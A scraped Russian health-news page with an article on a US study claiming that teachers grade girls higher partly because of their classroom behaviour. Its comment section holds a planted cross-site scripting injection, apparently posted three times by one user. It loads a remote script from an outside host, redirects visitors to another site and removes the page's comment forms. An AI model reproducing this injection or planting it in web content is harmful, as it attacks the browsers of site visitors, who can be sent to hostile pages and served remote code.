Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почему девочки учатся луч...  >>  Почему девочки учатся лучше мальчишек? Оказывается, виноваты учителя!
 
Обратная связь
 

Почему девочки учатся лучше мальчишек? Оказывается, виноваты учителя!

Размер шрифта
03 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Известно, что девочки чаще радуют своих мам и пап хорошими оценками. Связано ли это исключительно с умом или с чем-то еще? Американские ученые решили разобраться в этом вопросе.

Почему девочки учатся лучше мальчишек? Оказывается, виноваты учителя!

Данное исследование проводилось совместными силами Колумбийского университета и Университета Джорджии (оба – США). Ученые пришли к выводу, что поведение учеников в классе влияет на систему оценивания ученической успеваемости со стороны учителей.

«Как бы ни старался учитель быть полностью объективным, на его педагогический взгляд все-таки влияют внешние факторы. Поведение учеников являются одним из таких факторов», – рассказывает Кристофер Корнуэлл, глава исследования. «Внимательность, исполнительность, жажда знаний, организованность, уступчивость – вот те ключевые поведенческие характеристики учеников, которые ценят учителя. И любой родитель, у которого есть сын и дочь, согласится, что девочкам в большей степени свойственны вышеупомянутые черты».

В течение длительного срока эксперты наблюдали за почти шестью тысячами учеников младших классов и их преподавателями. Периодически они тестировали детей по базовым предметам (чтение, математика и другие) и сверяли свои данные с оценками учителей.

Оказалось, что гендерные различия в системе оценок проявляются очень рано и всегда в выигрыше оказываются именно девочки. Успеваемость мальчиков зачастую оказывалась ниже, чем можно было бы предположить исходя из внутреннего тестирования ученых.

Феномен, который лежит в основе такого несоответствия, авторы называют «влиянием не когнитивных навыков на педагогическое восприятие». «Не когнитивный», значит, не имеющий отношения к собственно обучению и познанию. Поведение во время урока, склонность к выпячиванию своих проблем, эмоциональная несдержанность – это и многое другое играет не последнюю роль в голове учителя, когда он выводит жирную двойку в журнале. Интересно, что тихие послушные мальчики, поведение которых во многом напоминает девочек, обычно охотнее поощряются хорошими оценками.

Доктор Корнуэлл убежден, что эта закономерность имеет огромные отдаленные последствия.

«Все мы понимаем, что оценки – это не просто циферки в дневнике и журнале. Они играют колоссальную роль в самой судьбе ученика, формируя его шансы на попадание, например, в привилегированный класс, а затем и в колледж или университет», – говорит Корнуэлл. «И если фактор пола начинает проявляться столь рано, неудивительно, что к моменту выпуска девочки могут оказаться в выигрышном положении».

Этот тезис находит подтверждение и при рассмотрении данных из высших учебных заведений.

«Количество студентов мужского пола падает в последнее время, в отличие от их прекрасных коллег. И более 60% бакалаврских дипломов сегодня получают девушки, тогда как еще 30-40 лет они составляли безусловное меньшинство среди контингента вузов».

Открытым остается вопрос, как бороться с этим необъективным половым распределением.

«Необходимы дальнейшие исследования в данной области, которые пролили бы свет на истинное положение вещей», – говорит Корнуэлл. «В частности, неизвестно, влияет ли пол учителя на его педагогическое восприятие. Ведь, как известно, большинство преподавателей – женщины. Может, это и есть ответ?»

Результаты данного исследования были опубликованы в журнале «Человеческие возможности» (Journal of Human Resources).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ваш ребенок встречается с кем-то в школе? Его выгонят!   Все, что вы помните о детстве, – неправда   ЭКО не влияет на здоровье детей   Даже дети знают, когда вы врете  
21 июня 2013Хочешь, чтобы у твоего ребенка не было аллергии, – пососи его соску! 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 

Слайдшоу

1
Как научить ребенка есть правильно. Что можно и нельзя
Как правильно кормить грудью
Первые шаги вашего малыша

Тесты

1
Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.